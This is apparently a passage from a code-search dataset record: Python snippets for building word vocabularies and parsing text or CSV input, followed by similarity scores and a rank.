enumerate(train_tweets_dict.items()):\n corpus.append(v.lower())\n\n for i, (k, v) in enumerate(test_tweets_dict.items()):\n corpus.append(v.lower())\n\n tfidf_vectorizer.fit_transform(corpus)\n #print(Tfidf_vect.vocabulary_)\n #print(len(Tfidf_vect.vocabulary_))\n #print(Tfidf_vect.idf_)\n print(\" size of vocabulary: {}\".format(len(tfidf_vectorizer.vocabulary_)))\n return tfidf_vectorizer", "def get_instruction_vocabulary(self) -> List[str]:\n vocab_dict: Dict[str, int] = {}\n for game_id, game in self._train_games.items():\n if game_id in self._update_ids:\n for example in game.get_examples():\n for token in example.get_instruction():\n if token not in vocab_dict:\n vocab_dict[token] = 0\n vocab_dict[token] += 1\n\n return [wordtype for wordtype, count in vocab_dict.items() if\n count >= self._args.get_minimum_wordtype_occurrence()]", "def gen_dtm(text_data, vocab):\n vectorizer = sklearn.feature_extraction.text.CountVectorizer(\n vocabulary = vocab)\n return vectorizer.fit_transform(text_data)", "def vocab_from_text_corpus(test_corpus: Iterable) -> Set[str]:\n return set(VocabUtils.flatten(test_corpus))", "def build_train_data(self,data_folder, cv=10, clean_string=False):\n revs = []\n\n vocab = defaultdict(float)\n print data_folder\n with codecs.open( data_folder, 'rb') as fi:\n for line in fi.readlines():\n line = line.decode('utf-8')\n parts = line.split(\"\\n\")[0].split(\"\\t\")\n if len(parts) > 1:\n sent = parts[1]\n rev = []\n 
rev.append(sent.strip())\n\n if clean_string:\n orig_rev = self.dc.clean_str(\" \".join(rev))\n else:\n orig_rev = \" \".join(rev).lower()\n #print orig_rev\n words = set(orig_rev.split())\n for word in words:\n vocab[word.lower()] += 1\n if len(orig_rev.split()) < 50 :\n\n datum = {\"y\":int(parts[0]),\n \"text\": orig_rev,\n \"num_words\": len(orig_rev.split()),\n \"split\": np.random.randint(0,cv)}\n revs.append(datum)\n # else:\n # print orig_rev\n\n\n return revs, vocab", "def buildVocabulary(paragraphs, verbose=True):\n vocabulary = []\n \n for p in paragraphs:\n for word in p.split():\n vocabulary.append(word)\n\n vocabulary = set(vocabulary)\n if verbose:\n print('Built vocabulary of %d unique words'%len(vocabulary))\n \n return list(vocabulary)", "def generate_vocab():\n\n vocab_dict = {}\n folder_path = os.listdir(args.f)\n for subfolder in folder_path:\n subfolder_path = os.path.join(args.f, subfolder)\n for filename in os.listdir(subfolder_path):\n with open(os.path.join(subfolder_path, filename), 'r') as file:\n read_file = file.read()\n normalised_text = re.sub(r\"[^\\s\\w]\", \" \", read_file.lower())\n vocab = normalised_text.split() #.split() creates a list of strings\n vocab_dict.update({i: 0 for i in vocab})\n return vocab_dict", "def get_vocab(self, filename):\n return read_file(filename) #TODO(tilo): the-FAQ!", "def initialize_vocabulary(vocabulary_path):\n if gfile.Exists(vocabulary_path):\n rev_vocab = []\n with gfile.GFile(vocabulary_path, mode=\"rb\") as f:\n rev_vocab.extend(f.readlines())\n rev_vocab = [tf.compat.as_bytes(line.strip()) for line in rev_vocab]\n vocab = dict([(x, y) for (y, x) in enumerate(rev_vocab)])\n return vocab, rev_vocab\n else:\n raise ValueError(\"Vocabulary file %s not found.\", vocabulary_path)", "def build_vocab(sentences_list, vocab_size, visual_fld):\n words = [word for sentence in sentences_list for word in sentence]\n utils.safe_mkdir(visual_fld)\n with open(os.path.join(visual_fld, 'vocab.tsv'), 'w') as fd:\n dictionary = {}\n index_dictionary = {}\n count = [('UNK', -1)]\n count.extend(Counter(words).most_common(vocab_size - 1))\n for index, (word, _) in enumerate(count):\n dictionary[word] = index\n index_dictionary[index] = word\n fd.write(word + '\\n')\n\n return dictionary, index_dictionary", "def _init_vocab(self):\n self._word2idx = {}\n self._idx2word = {}\n self.freqs = {}\n self.vocab_size = 0\n\n self._add_word(self.pad_word)\n self._add_word(self.start_word)\n self._add_word(self.end_word)\n self._add_word(self.unk_word)\n\n self.start_word_idx = self.stoi(self.start_word)\n self.end_word_idx = self.stoi(self.end_word)\n self.unk_word_idx = self.stoi(self.unk_word)\n self.pad_word_idx = self.stoi(self.pad_word)\n\n self._special_tokens = {\n 'bos_token': self.start_word,\n 'cls_token': self.start_word,\n 'eos_token': self.end_word,\n 'sep_token': self.end_word,\n 'pad_token': self.pad_word,\n 'unk_token': self.unk_word,\n }\n\n self._special_ids = {\n 'bos_token_id': self.start_word_idx,\n 'cls_token_id': self.start_word_idx,\n 'eos_token_id': self.end_word_idx,\n 'sep_token_id': self.end_word_idx,\n 'pad_token_id': self.pad_word_idx,\n 'unk_token_id': self.unk_word_idx,\n }\n\n self.cls_token_id = self.bos_token_id = self.start_word_idx\n self.eos_token_id = self.sep_token_id = self.end_word_idx\n self.pad_token_id = self.pad_word_idx\n self.unk_token_id = self.unk_word_idx\n\n self.cls_token = self.bos_token = self.start_word\n self.eos_token = self.sep_token = self.end_word\n self.pad_token = self.pad_word\n 
self.unk_token = self.unk_word", "def get_vocab_words_from_json(self, remove_stops, min_word_freq):\n all_text = self.get_all_txt_from_json()\n vocab_with_counts = self.get_vocabulary_words_with_counts(all_text, min_word_freq)\n vocab_words = [w[0] for w in vocab_with_counts if len(w[0]) > 1] # avoid empty string and single characters\n if remove_stops:\n vocab_words = [w for w in vocab_words if w not in self.stop_words]\n return vocab_words", "def getVocabList():\n vocab_list = []\n with open('vocab.txt') as f_obj:\n while True:\n vocab_line = f_obj.readline()\n if not vocab_line:\n break\n word = re.search(r'\\t(\\w+)', vocab_line).group(1)\n vocab_list.append(word)\n return vocab_list", "def build_vocab(self, min_count=3):\n word2count = defaultdict(int)\n for sentence in self.tokenized_corpus:\n for word in sentence:\n word2count[word] += 1\n\n word2dict = {}\n word2dict['PAD'] = {'id': 0}\n word2dict['UNK'] = {'id': 1}\n for word in word2count:\n if word2count[word] >= min_count:\n word2dict[word] = {'id': len(word2dict), 'count': word2count[word]}\n self.vocab = word2dict", "def load_glove_embeddings():\n data = open(\"glove.6B.50d.txt\",'r',encoding=\"utf-8\")\n embeddings = []\n word_index_dict = {'UNK':0}\n index = 1\n for lines in data:\n wordVector = lines.split(\" \")\n if(wordVector[0] in string.punctuation or any(char.isdigit() for char in wordVector[0])):\n continue\n embeddings.append(wordVector[1:-1])\n word_index_dict[wordVector[0]] = index\n index+=1\n print(\"done\")\n\n return embeddings, word_index_dict", "def _initialize_corpus(self):\n vocab = self.vocab # vocab is the word vector\n theta = self.theta # theta is the model parameter\n corpus = self.corpus\n\n for line in corpus:\n for word in line:\n if word not in vocab:\n vocab[word] = init_vector(self.n)\n theta[word] = init_vector(self.n)\n\n if self.verbose:\n print(f\"{len(vocab)} words have been loaded\")", "def initialize_vocabulary(vocabulary_path):\n if gfile.Exists(vocabulary_path):\n rev_vocab = []\n with gfile.GFile(vocabulary_path, mode=\"rb\") as f:\n rev_vocab.extend(f.readlines())\n rev_vocab = [line.strip() for line in rev_vocab]\n vocab = dict([(x, y) for (y, x) in enumerate(rev_vocab)])\n return vocab, rev_vocab\n else:\n raise ValueError(\"Vocabulary file %s not found.\", vocabulary_path)", "def build_vocab(sentences, vocab_limit):\n # Build vocabulary\n word_counts = Counter(itertools.chain(*sentences))\n print( 'Total size of vocab is {}'.format(len(word_counts.most_common())))\n # Mapping from index to word\n # vocabulary_inv = [x[0] for x in word_counts.most_common(vocab_limit)]\n vocabulary_inv = [x[0] for x in word_counts.most_common(vocab_limit)]\n \n vocabulary_inv = list(sorted(vocabulary_inv))\n # Mapping from word to index\n vocabulary = {x: i+1 for i, x in enumerate(vocabulary_inv)}\n return [vocabulary, vocabulary_inv]", "def __init__(self, vocab_file, max_size):\n\t\tself._word_to_id = {}\n\t\tself._id_to_word = {}\n\t\tself._count = 0 # keeps track of total number of words in the Vocab\n\n\t\t# [UNK], [PAD], [START] and [STOP] get the ids 0,1,2,3.\n\t\tfor w in [UNKNOWN_TOKEN, PAD_TOKEN, START_DECODING, STOP_DECODING]:\n\t\t\tself._word_to_id[w] = self._count\n\t\t\tself._id_to_word[self._count] = w\n\t\t\tself._count += 1\n\n\t\t# Read the vocab file and add words up to max_size\n\t\twith open(vocab_file, 'r') as vocab_f:\n\t\t\tfor line in vocab_f:\n\t\t\t\tpieces = line.split()\n\t\t\t\tif len(pieces) != 2:\n\t\t\t\t\tprint ('Warning: incorrectly formatted line in vocabulary 
file: %s\\n' % line)\n\t\t\t\t\tcontinue\n\t\t\t\tw = pieces[0]\n\t\t\t\tif w in [SENTENCE_START, SENTENCE_END, UNKNOWN_TOKEN, PAD_TOKEN, START_DECODING, STOP_DECODING]:\n\t\t\t\t\traise Exception(\n\t\t\t\t\t\t'<s>, </s>, [UNK], [PAD], [START] and [STOP] shouldn\\'t be in the vocab file, but %s is' % w)\n\t\t\t\tif w in self._word_to_id:\n\t\t\t\t\traise Exception('Duplicated word in vocabulary file: %s' % w)\n\t\t\t\tself._word_to_id[w] = self._count\n\t\t\t\tself._id_to_word[self._count] = w\n\t\t\t\tself._count += 1\n\t\t\t\tif max_size != 0 and self._count >= max_size:\n\t\t\t\t\tprint (\"max_size of vocab was specified as %i; we now have %i words. Stopping reading.\" % (\n\t\t\t\t\tmax_size, self._count))\n\t\t\t\t\tbreak\n\n\t\tprint (\"Finished constructing vocabulary of %i total words. Last word added: %s\" % (\n\t\tself._count, self._id_to_word[self._count - 1]))", "def _make_vocab_files(self):\n self.logger.info('making question vocab...' + self.opt.QUESTION_VOCAB_SPACE)\n qdic, _ = self.load_data(self.opt.QUESTION_VOCAB_SPACE)\n question_vocab = VQADataProvider.make_question_vocab(qdic, self.max_length)\n self.logger.info('making answer vocab...' + self.opt.ANSWER_VOCAB_SPACE)\n qdic, adic = self.load_data(self.opt.ANSWER_VOCAB_SPACE)\n answer_vocab = VQADataProvider.make_answer_vocab(adic, qdic, self.opt.MAX_ANSWER_VOCAB_SIZE, self.use_ocr)\n return question_vocab, answer_vocab" ]
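The negatives above all circle one core recipe: count tokens, order them by frequency, and assign integer ids. A minimal distilled version of that pattern, written here purely for illustration (it is not one of the dataset's snippets):

from collections import Counter

def build_word_to_id(sentences, vocab_size=None):
    # Count every token across the corpus.
    counts = Counter(tok for sent in sentences for tok in sent)
    # Most frequent words get the smallest ids; ties break alphabetically.
    pairs = sorted(counts.items(), key=lambda kv: (-kv[1], kv[0]))
    if vocab_size is not None:
        pairs = pairs[:vocab_size]  # keep only the top-k words
    return {word: i for i, (word, _) in enumerate(pairs)}

# build_word_to_id([["a", "b", "a"]]) -> {'a': 0, 'b': 1}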
[ "0.7562361", "0.7207228", "0.7081693", "0.70540327", "0.7029069", "0.70169085", "0.7005524", "0.7005293", "0.7000013", "0.69506437", "0.69444656", "0.6888032", "0.6835956", "0.68238574", "0.6815228", "0.6788677", "0.6784426", "0.6746104", "0.6692373", "0.6628482", "0.660853", "0.65966874", "0.6590938", "0.65770054", "0.6518075", "0.6517311", "0.6511452", "0.65074986", "0.6500501", "0.6489932", "0.64769924", "0.6468995", "0.6449437", "0.6429598", "0.6423086", "0.6417431", "0.6411804", "0.6391895", "0.6372662", "0.6369151", "0.63594526", "0.63540536", "0.6341926", "0.63415396", "0.63345253", "0.6320891", "0.6314651", "0.6313613", "0.6311068", "0.6298519", "0.6258987", "0.6244974", "0.624036", "0.62401724", "0.623945", "0.6221216", "0.62207365", "0.6211871", "0.6206888", "0.6200254", "0.6194619", "0.6194619", "0.6194619", "0.6191754", "0.6189528", "0.61886317", "0.6186254", "0.61845064", "0.6170493", "0.61659616", "0.6157029", "0.615103", "0.61427337", "0.6141484", "0.61403054", "0.6125365", "0.61241424", "0.6122439", "0.6101403", "0.609684", "0.60963035", "0.6080102", "0.6079136", "0.6074569", "0.6074226", "0.6067544", "0.60661906", "0.6057169", "0.6055544", "0.6039234", "0.60338223", "0.60269", "0.6023609", "0.60215455", "0.60151154", "0.6010935", "0.6010185", "0.6003585", "0.6001012", "0.6000285" ]
0.7412368
1
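One plausible reading of the three fields above, assuming (the dump itself does not say) that document_rank counts how many negatives outscore the positive document:

document_score = 0.7412368
negative_scores = [0.7562361, 0.7207228, 0.7081693]  # head of the list above, abbreviated
rank = sum(s > document_score for s in negative_scores)
# rank == 1: only 0.7562361 exceeds the document's score, matching the document_rank above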
Parse and explode input data
def parse_data(filename): labels = [] documents = [] with open(filename, 'r') as f: for line in f: values = line.split() label = values[0] document = [] for wordCount in values[1:]: parsed = wordCount.split(':') word = parsed[0] count = int(parsed[1]) document.append((word, count)) labels.append(label) documents.append(document) return (labels, documents)
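The input format is implied by the code: each line is a label followed by word:count pairs. A tiny usage sketch (the file name and contents are made up for illustration):

# contents of a hypothetical train.txt:
#   spam free:3 money:2
#   ham meeting:1
labels, documents = parse_data('train.txt')
# labels    == ['spam', 'ham']
# documents == [[('free', 3), ('money', 2)], [('meeting', 1)]]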
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def prepare_data(self, lines: List[str]) -> List[str]:\n if self.is_tokenized:\n if self.parser == \"spacy\":\n lines = [l.split() for l in lines]\n elif self.parser == \"udpipe\":\n lines = [[l.split()] for l in lines]\n\n return lines", "def parseInput(input, delimiter='|'):\n return input.split(delimiter)", "def parse(self, input):\n pass", "def __parse_string_for_delimiter__(self, data):\n parsed = []\n for row in data:\n row = self.__remove_break_line__(row)\n row = self.__split_for_delimiter__(row)\n parsed.append(row)\n return parsed", "def parse_data_inputs(data_inputs):\n match = re.search(r'\\[(.*)\\]', data_inputs)\n\n kwargs = dict((x.split('=')[0], json.loads(x.split('=')[1]))\n for x in match.group(1).split(';'))\n\n variables = [Variable.from_dict(x) for x in kwargs.get('variable', [])]\n\n domains = [Domain.from_dict(x) for x in kwargs.get('domain', [])]\n\n operation = [Process.from_dict(x) for x in kwargs.get('operation', [])]\n\n return operation, domains, variables", "def _get_data(self, input_data: str) -> None:\n\t\tdata: List[str]\n\t\t# Set data to a single-element list of [\"None\"]\n\t\tif input_data is None:\n\t\t\tself._data = [\"None\"]\n\t\t\treturn\n\t\t# Strip input data to prevent leading/trailing space interfering with type determination\n\t\traw_data: str = input_data.strip()\n\n\t\t# Get separator, or set data to a single-element list before exiting\n\t\tif \",\" in raw_data:\n\t\t\t# Set separator values\n\t\t\tself.sep_char = \",\"\n\t\t\tself.sep_str = \", \"\n\t\telif \"|\" in raw_data:\n\t\t\t# Set separator values\n\t\t\tself.sep_char = \"|\"\n\t\t\tself.sep_str = \" | \"\n\t\telif \" \" in raw_data:\n\t\t\t# Set separator values\n\t\t\tself.sep_char = \" \"\n\t\t\tself.sep_str = \" \"\n\t\telse:\n\t\t\t# If not a list, set to a single-element list, then exit.\n\t\t\tself._data = [raw_data]\n\t\t\treturn\n\n\t\t# Split, then strip whitespace\n\t\tdata = raw_data.split(self.sep_char)\n\t\tfor i in range(len(data)):\n\t\t\tdata[i] = data[i].strip()\n\n\t\t# Return\n\t\tself._data = data", "def parseFileInput(data: List[str]):\n rowsAndCols = data[0].strip().split(' ')\n rows = int(rowsAndCols[0])\n cols = int(rowsAndCols[1])\n\n res = ''\n for line in data[1:]:\n for item in line.strip().split(' '):\n res += item\n\n return res, [rows, cols]", "def _pre_process_record(self, data):\n result = []\n symbolic_split = \",\"\n if isinstance(data, dict):\n if self.measure is None:\n logging.error(\"Missing the name of keys pointing to values\")\n raise UnSADException.data_format_exception()\n if self.timestamp is not None:\n if self.timestamp in data:\n try:\n result.append(float(data[self.timestamp]))\n [result.append(data[measure])\n for measure in self.measure]\n except RuntimeError:\n logging.error(\"Invalid input data type, should be a numerical type\")\n logging.error(\"Input data should contain all the fields \"\n \"that are specified when initialize the detector: \" + str(self.measure))\n raise UnSADException.data_type_exception()\n else:\n logging.error(\"Input data should contain a timestamp field:\" + str(self.timestamp))\n raise UnSADException.data_format_exception()\n else:\n try:\n [result.append(data[measure]) for measure in self.measure]\n except RuntimeError:\n logging.error(\"Input data should contain all the fields \"\n \"that are specified when initialize the detector: \" + str(self.measure))\n raise UnSADException.data_format_exception()\n elif isinstance(data, Iterable) and not isinstance(data, str):\n if self.timestamp is not 
None:\n if len(data) == len(self.measure) + 1:\n try:\n result = list(data)\n result[0] = float(result[0])\n except RuntimeError as e:\n logging.error(\"Invalid input data type, timestamp should be a numerical type\")\n raise UnSADException.data_type_exception()\n else:\n logging.error(\"The number of input parameters:\" + str(\n len(data)) + \" does not match with this detectors:\" + str(len(self.measure) + 1))\n raise UnSADException.input_number_exception()\n else:\n if self.measure is None or len(data) == len(self.measure):\n result = data\n else:\n logging.error(\"The number of input parameters:\" + str(\n len(data)) + \" does not match with this detectors:\" + str(len(self.measure)))\n raise UnSADException.input_number_exception()\n else:\n if (self.measure is None or len(self.measure) == 1) and self.timestamp is None:\n if self.symbolic:\n return str(data)\n else:\n try:\n return float(data)\n except RuntimeError as e:\n logging.error(\"Invalid input data type, should be a numerical type\")\n raise UnSADException.data_type_exception()\n else:\n logging.error(\"This detector is not initialized properly\")\n raise UnSADException.not_proper_initialize_exception()\n\n if not self.symbolic:\n try:\n processed_result = [float(result[i])\n for i in range(len(result))]\n except RuntimeError as e:\n logging.error(\"Invalid input data type, should be a numerical type\")\n raise UnSADException.data_type_exception()\n\n return processed_result[0] if len(processed_result) == 1 else processed_result\n\n else:\n if self.timestamp is not None:\n return [result[0], symbolic_split.join([str(s) for s in result[1:]])]\n else:\n return symbolic_split.join([str(s) for s in result])", "def parse_dataset(self, data):\n pass", "def structure(self, ism_input):\n f = open(ism_input, 'r')\n data = []\n for line in f:\n line = line.replace('\\\"', '')\n line = line.replace('],[', '];[')\n line = line.strip()\n line = line.replace(']', '')\n line = line.replace('[', '')\n line = line.split(';')\n line[0] = line[0].split('|')\n ls = list(map(lambda x: x.split(','), line[1:]))\n ls = list(map(lambda x: list(map(lambda y: y.split('|'), x)), ls))\n line[1:] = ls\n data.append(line)\n data = np.array(data[1:]) \n \n return data", "def parse_input(question_ids, answer_ids):\r\n input_ids = list()\r\n input_ids.append(BERT_CLS)\r\n input_ids.extend(question_ids)\r\n input_ids.append(BERT_SEP)\r\n input_ids.extend(answer_ids)\r\n input_ids_truncated = input_ids[:BERT_INPUT_WORD_LEN]\r\n # print(input_ids_truncated)\r\n assert len(input_ids_truncated) <= BERT_INPUT_WORD_LEN, 'input_ids len can not exceed %d' % BERT_INPUT_WORD_LEN\r\n # print('input_ids_truncated_len ', len(input_ids_truncated))\r\n segment_ids = list()\r\n segment_question_ids = ['0'] * (len(question_ids) + 2)\r\n segment_answer_ids = ['1'] * (len(input_ids_truncated) - len(question_ids) - 2)\r\n segment_ids.extend(segment_question_ids)\r\n segment_ids.extend(segment_answer_ids)\r\n input_masks = ['1'] * len(input_ids_truncated)\r\n input_ids_parsed = RECORD_SPLIT_FLAG.join(input_ids_truncated)\r\n segment_ids_str = RECORD_SPLIT_FLAG.join(segment_ids)\r\n input_masks_str = RECORD_SPLIT_FLAG.join(input_masks)\r\n # print('segmend_ids ', segment_ids_str)\r\n # print('input_masks ', input_masks_str)\r\n return input_ids_parsed, segment_ids_str, input_masks_str", "def _build_data_from_text(self, text):\n # get CSV field\n text = text.split(self._data_sep)[self._data_col]\n # tokenize\n return super()._build_data_from_text(text)", "def 
parse_input(giant_string):\n X_train_part, Y_train_part, X_test_part = giant_string.split(\"XXX\")\n\n X_train_row_strings = X_train_part.split(\"S\")\n X_train_rows = [[float(x) for x in row.split(\",\")] for row in X_train_row_strings]\n X_train = np.array(X_train_rows)\n\n Y_train = concatenated_string_to_array(Y_train_part)\n\n X_test_row_strings = X_test_part.split(\"S\")\n X_test_rows = [[float(x) for x in row.split(\",\")] for row in X_test_row_strings]\n X_test = np.array(X_test_rows)\n\n return X_train, Y_train, X_test", "def parse_data(self, data):\n output=[]\n for entry in data:\n output.append(entry.replace('\\r','').replace('\\n',''))\n return output", "def make_split_data(read_data):\n split_data = re.split('[,|\\.|\\-|\\*|\\[|\\]|\\#|\\:|\\;|(\\|)|\\\"|\\'|!|\\s]+',read_data)\n\n if split_data[-1] == '':\n del split_data[-1]\n\n return split_data", "def parse_input(giant_string):\r\n X_train_part, Y_train_part, X_test_part = giant_string.split(\"XXX\")\r\n\r\n X_train_row_strings = X_train_part.split(\"S\")\r\n X_train_rows = [[float(x) for x in row.split(\",\")] for row in X_train_row_strings]\r\n X_train = np.array(X_train_rows)\r\n\r\n Y_train = concatenated_string_to_array(Y_train_part)\r\n\r\n X_test_row_strings = X_test_part.split(\"S\")\r\n X_test_rows = [[float(x) for x in row.split(\",\")] for row in X_test_row_strings]\r\n X_test = np.array(X_test_rows)\r\n\r\n return X_train, Y_train, X_test", "def process_data(line):\n wire_path_data = []\n for i in line:\n wire_path_data.append(i.strip('\\n').split(','))\n return wire_path_data", "def parse_data( self, data ):\n data = data.split( ',' )\n data = list( map( lambda x: x.strip(), data ) ) # remove white space\n # create data structure\n fields = [\n 'time',\n 'value'\n ] \n Reading = namedtuple( 'Reading', fields )\n \n try:\n return [ Reading( time = float( data[ i + 1 ] ), value = float( data[ i ] ) ) for i in range( 0, len( data ), len( fields ) ) ]\n \n except ValueError as err:\n raise err", "def _parse_import_data(self, data, import_fields, options):\n return self._parse_import_data_recursive(self.model_id.model, '', data, import_fields, options)", "def _parse_input(self):\n #temperature\n regex = re.compile(\"TEMP=(\\d+\\.\\d*|\\d+)\")\n r = regex.search(self.file_dic['input'])\n if r:\n self.temperature = r.groups()[0]\n else:\n self.temperature = 298.15\n #theory\n regex = re.compile('(\\$contrl.+\\$end|\\$basis.+ \\$end)')\n temp_theory = regex.findall(self.file_dic['input'])\n contrl = temp_theory[0][:-4][7:].strip()\n basis = temp_theory[1][:-4][6:].strip()\n self.theory = contrl + ' ' + basis", "def parse(self, data):\n raise NotImplementedError", "def parse_inputs(inputs):\n parsed = inputs.split('\\n')\n\n result_set = dict()\n this_tile = []\n tile_id = 0\n for line in parsed:\n if 'Tile' in line:\n tile_id = re.search('Tile ([0-9]+):', line).group(1)\n elif line:\n line = line.replace('#', '1').replace('.', '0')\n split_line = [int(x) for x in line]\n this_tile.append(split_line)\n else:\n result_set[tile_id] = array(this_tile)\n this_tile = []\n tile_id = 0\n\n return result_set", "def parse(self):\n\t\tfirst = None\n\t\tf = open(self.input_file)\n\t\tfor line in f.readlines():\n\t\t\tif line.startswith(\"#\"):\n\t\t\t\tcontinue\n\t\t\ttry:\n\t\t\t\tflow,t,sequence,size = line.split()\n\t\t\texcept:\n\t\t\t\tcontinue\n\t\t\t# append data to a list of tuples\n\t\t\tflow = int(flow)\n\t\t\tt = float(t)\n\t\t\tsequence = int(sequence)\n\t\t\tif size == \"x\":\n\t\t\t\tcontinue\n\t\t\tsize = 
int(size)\n\t\t\tif not size == 0:\n\t\t\t\tif flow == 1:\n\t\t\t\t\tself.data1.append((t,sequence,size))\n\t\t\t\telif flow == 2:\n\t\t\t\t\tself.data2.append((t,sequence,size))\n\t\t\t\telif flow == 3:\n\t\t\t\t\tself.data3.append((t, sequence, size))\n\t\t\t\telif flow == 4:\n\t\t\t\t\tself.data4.append((t, sequence, size))\n\t\t\t\telif flow == 5:\n\t\t\t\t\tself.data5.append((t, sequence, size))\n\t\t\t\telse:\n\t\t\t\t\tprint \"Erroneous data: \",flow, t, sequence, size\n\t\t\t# Keep track of the minimum and maximum time seen\n\t\t\tif not self.min_time or t < self.min_time:\n\t\t\t\tself.min_time = t\n\t\t\tif not self.max_time or t > self.max_time:\n\t\t\t\tself.max_time = t\n\n\t\t\t# print len(self.data1),len(self.data2),len(self.data3),len(self.data4),len(self.data5)", "def parse(self):\n result = list()\n for i, line in enumerate([x.strip() for x in self._input_file], 1):\n if not line:\n continue\n # There should be only 2 entries. Example:\n # kernel`0xffffffff8074d27e;kernel`_sx_xlock 1\n try:\n frames, value = line.split()\n frames = [trim_offset(n) for n in frames.split(';')]\n except ValueError:\n raise StackCollapserException('Unable to parse line {}'.format(i))\n result.append((frames, int(value)))\n return result", "def parse_xdot_data(self, data):\n\n parser = self.parser\n# if pyparsing_version >= \"1.2\":\n# parser.parseWithTabs()\n if data:\n return parser.parseString(data)\n else:\n return []", "def dataNormalize(data):\n tr = re.sub('<(.*)>|\\\\n', '', data.prettify())\n return re.sub(' +', ',', tr).split(',')", "def parse(cls, data):\n raise NotImplementedError", "def split_data(self):\n if self.seper == \"whitespace\":\n seperstring = \" \"\n elif self.seper == \"comma\":\n seperstring = \",\"\n elif self.seper == \"tab\":\n seperstring = \"\\t\"\n else:\n print self.seper + \"is not a supported delimiter. 
Only whitespace, comma, and tab are accepted.\"\n sys.exit()\n f = open(self.filelocation, \"rb\")\n temp = list()\n for line in f.readlines():\n temp.append(line.replace(\"\\n\", \"\").split(seperstring))\n f.close()\n data = dict()\n count = 0\n for row in temp:\n data[count] = list()\n for each in row:\n if each is not \"\":\n data[count].append(each)\n count += 1\n return data, count", "def deserialize(self, data):\n if not data:\n return\n q = collections.deque(data.split(self.sep))\n res = self.dfs2(q)\n return res", "def data_parser(data):\n\n with open(data, 'r') as inp:\n\n # take every sample\n # the last line in the text file is empty, so reading until -1\n samples = inp.read().split('\\n')[:-1]\n\n vec = []\n labels = []\n for sample in samples:\n # file is tab delimited\n split_samples = sample.split('\\t')\n # last column contains the label\n labels.append(int(split_samples[-1]))\n\n features = []\n for feature in split_samples[:-1]:\n features.append(float(feature))\n vec.append(features)\n\n # make the features and labels as a numpy array\n vec = np.array(vec)\n labels = np.array(labels)\n return vec, labels", "def parse_and_flatten(df, field_name):\n\n # Parse and flatten the list\n lst = list(df[field_name])\n lst = [x.split('|') for x in lst]\n\n lst_flat = []\n for slist in lst:\n for x in slist:\n lst_flat.append(x)\n return lst_flat", "def parse(arr_str):\n return arr_str.rstrip().replace(' ', '').split(',')[:-1]", "def parse_input(part=1):\n with open(\"input_23.txt\") as f:\n return [int(x) for x in f.readline().strip()]", "def parse_denormalized(line):\n id_, rating = line.strip().split(',')\n user, item = map(lambda x: x[1:], id_.split('_'))\n return user, item, rating", "def explode(delim, val, limit = None): \n if limit != None:\n return val.split(delim, limit)\n else:\n return val.split(delim)", "def deserialize(self, data):\n q = collections.deque(data.split(self.sep))\n \n res = self.dfs2(q)\n \n return res", "def csv_parser(s):\n\n # Data is our output. It will be a list of lists.\n\n # Split csv into lines and store them in a list called 'lines'.\n \n # Remove the first element from lines, so that you have only the data lines left.\n \n # At this stage, we loop through the list called lines.\n # As you loop\n # i. split each line on the commas;\n # ii. convert the Subject variable to int.\n # iii. convert the Height variable to float.\n # iv. add to data a list consisting of this line's Subject, Height, and Occupation values ", "def parse_data(fp):\n pass", "def extract_data(line):\n tmp = line.split('=',1)[1]\n tmp = tmp.split('data = ')[1:]\n tmp = [x.split('}') for x in tmp]\n tmp = [x[0] for x in tmp]\n tmp = [x.lstrip('{') for x in tmp]\n return tmp", "def parse_data(self):\n\t\traise NotImplementedError('%s: No parse function implemented!' 
% self.name)", "def parse(data):\n parser=Parser(data, True)\n return parser.parse()", "def format_data(data_string):\n lines = data_string.split('\\\"\\n\\\"')\n split_data = [re.split(r\"\\\"\\s*,\\s*\\\"\", line) for line in lines]\n\n return split_data", "def split(self, X):", "def get_input():\n # return TEST_INPUT.strip().split('\\n\\n')\n with open(INPUT_FILE) as f:\n return f.read().strip().split('\\n\\n')", "def parse_input(data: Iterator[str]) -> Iterator[SnailfishNumber]:\n yield from (SnailfishNumber.from_str(line.strip())\n for line in data)", "def parse_input():\r\n endpoints_file = open(\"input.txt\", \"r\")\r\n lines = endpoints_file.readlines()\r\n line_number = 0\r\n endpoints = []\r\n for line in lines:\r\n line = line.strip()\r\n if line_number == 0:\r\n period = int(line)\r\n elif line_number == 1:\r\n max_attempts = int(line)\r\n else:\r\n endpoints.append(line)\r\n line_number += 1\r\n endpoints_file.close()\r\n return endpoints, period, max_attempts", "def csv_parser(s):\r\n data = []\r\n lines = s.splitlines()\r\n lines = lines[1: ]\r\n for line in lines:\r\n l = line.strip().split(\",\")\r\n l[0] = int(l[0])\r\n l[1] = float(l[1])\r\n data.append(l)\r\n return data\r\n\r\n #data.pop[i]\r\n #file2 = s.split()\r\n #lines = []\r\n #lines.append(file2)\r\n #lines.pop[0]\r\n #print(lines)\r\n #for line in lines:\r\n \r\n\r\n # Data is our output. It will be a list of lists.\r\n\r\n # Split csv into lines and store them in a list called 'lines'.\r\n \r\n # Remove the first element from lines, so that you have only the data lines left.\r\n \r\n # At this stage, we loop through the list called lines.\r\n # As you loop\r\n # i. split each line on the commas;\r\n # ii. convert the Subject variable to int.\r\n # iii. convert the Height variable to float.\r\n # iv. 
add to data a list consisting of this line's Subject, Height, and Occupation values \r", "def preprocess_split(self, input_dataset, last_id, num_sents, max_sent_len, prefix_id = \"\"):\n dataset = []\n for sent in input_dataset[last_id:]:\n last_id += 1\n if type(sent) == tuple or len(sent) > max_sent_len or len(sent) <= 1:\n continue\n dataset.append(self.preprocess_sent(sent, prefix_id + str(len(dataset))))\n if len(dataset) == num_sents:\n break\n\n return dataset, last_id", "def parser(sent_list): #input: list of sentences", "def base_parsing(lines):\n lines = [l.strip() for l in lines]\n return [ tuple(line.split(sep='-')) for line in lines ]", "def _parseLine(self, line, delimiter = \":\"):\r\n\t\tsplt = line.split(delimiter)\r\n\t\tinVec = self._parseVec(splt[0])\r\n\t\toutVec = self._parseVec(splt[1])\r\n\t\tif (len(splt) == 2):\r\n\t\t\tlabel = \"\"\r\n\t\telse:\r\n\t\t\tlabel = splt[2]\r\n\t\tself.data.append({'in':inVec, 'out':outVec, 'label':label})", "def parse_normalized(line):\n return line.strip().split(',')", "def split_into_tokens(dataset, delimiter=\"\"):\n pass", "def parse(text):\n # Make sure that there's text to be split\n if text == None:\n return text\n return text.split(',')", "def read_input():\n splits = []\n with open('solutions/day5/input.txt') as f:\n for line in f:\n splits.append(line.strip('\\n'))\n return splits", "def process_data(data: str) -> list[Instruction]:\n instructions = 